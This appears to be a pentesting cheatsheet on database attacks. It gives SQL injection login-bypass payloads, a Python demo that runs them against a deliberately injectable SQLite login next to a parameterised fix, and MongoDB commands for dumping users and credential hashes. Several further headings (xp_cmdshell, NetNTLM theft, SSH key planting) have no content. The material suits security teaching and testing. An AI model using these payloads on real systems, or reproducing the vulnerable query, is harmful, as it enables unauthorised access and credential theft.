SQL Injection

Authentication bypass

Here's the classic payload:

tom' or 1=1;#

If the application errors because the injected query returns more than one row (code that expects exactly one user record is common), we can cap the result set with LIMIT. Combined with `or 1=1` this returns the first row in table order, which is frequently the first account created (often an administrator):

tom' or 1=1 LIMIT 1;#

Note that `#` is a MySQL comment marker. Against MSSQL, PostgreSQL or SQLite use `-- ` (with a trailing space, which MySQL requires) to comment out the rest of the query instead.

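As an added illustration that is not part of the original cheatsheet, the Python script below builds a throwaway SQLite database with constructed accounts and runs both payloads through a deliberately vulnerable, string-built login check that insists on exactly one matching row (an assumption about the application; it is what makes the bare `or 1=1` payload fail and the `LIMIT 1` variant succeed). The parameterised version beside it shows the fix. Because SQLite has no `#` comment, the payloads use `-- ` in place of `;#`.

```python
import sqlite3

# Constructed sample data; table layout and accounts are invented for this demo.
USERS = [("admin", "s3cret"), ("tom", "tompass"), ("alice", "alicepass")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)", USERS)
    return conn


def login_vulnerable(conn, username, password):
    """String-built query: the classic injectable login check.

    Mimics application code that expects exactly one matching row and errors
    otherwise, which is why the plain 'or 1=1' payload fails and 'LIMIT 1' works.
    """
    query = (
        f"SELECT username FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    rows = conn.execute(query).fetchall()
    if len(rows) != 1:
        raise ValueError(f"expected exactly one row, got {len(rows)}")
    return rows[0][0]


def login_safe(conn, username, password):
    """Parameterised version: the payload is bound as a literal username."""
    rows = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchall()
    return rows[0][0] if len(rows) == 1 else None


def try_payload(fn, payload):
    """Run one login attempt with a wrong password and report the outcome."""
    conn = make_db()
    try:
        return fn(conn, payload, "wrong")
    except ValueError as exc:
        return f"error: {exc}"


# SQLite has no '#' comment, so '-- ' (trailing space) plays the role of ';#'.
PAYLOAD_MULTI = "tom' or 1=1-- "
PAYLOAD_LIMIT = "tom' or 1=1 LIMIT 1-- "

if __name__ == "__main__":
    print(try_payload(login_vulnerable, PAYLOAD_MULTI))  # error: expected exactly one row, got 3
    print(try_payload(login_vulnerable, PAYLOAD_LIMIT))  # admin
    print(try_payload(login_safe, PAYLOAD_LIMIT))        # None
```

The first call trips the single-row check (all three accounts match), the second lands on the first row and logs in as `admin` without knowing any password, and the parameterised query treats the whole payload as a username that does not exist.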
Database analysis

Thanks to 0xsyr0 for the cheatsheet.

MongoDB

mongo "mongodb://localhost:27017"          // connect to an unauthenticated local instance
> use <DATABASE>;                          // switch to the database of interest
> show tables;                             // alias for show collections in the mongo shell
> show collections;
> db.system.keys.find();                   // internal key material, if present
> db.users.find();                         // dump an application users collection
> db.getUsers();                           // database-level accounts of the current db
> db.getUsers({showCredentials: true});    // include stored credential hashes
> db.accounts.find();
> db.accounts.find().pretty();             // same query, formatted output
> use admin;                               // repeat the user enumeration against admin

User Password Reset to "12345"

MSSQL

Show Database Content

OPENQUERY

Binary Extraction as Base64

Steal NetNTLM Hash / Relay Attack

Impacket mssqlclient.py

MySQL

Update User Password

Drop a Shell

xp_cmdshell

You can also execute base 64 encoded commands:

Insert Code to get executed

Write SSH Key into authorized_keys2 file

Linked SQL Server Enumeration

NoSQL Injection

PostgreSQL

Common Commands

Redis

Enter own SSH Key

SQL Injection

Master List

Authentication Bypass

SQL Truncation Attack

sqlite3

sqsh

sqlcmd
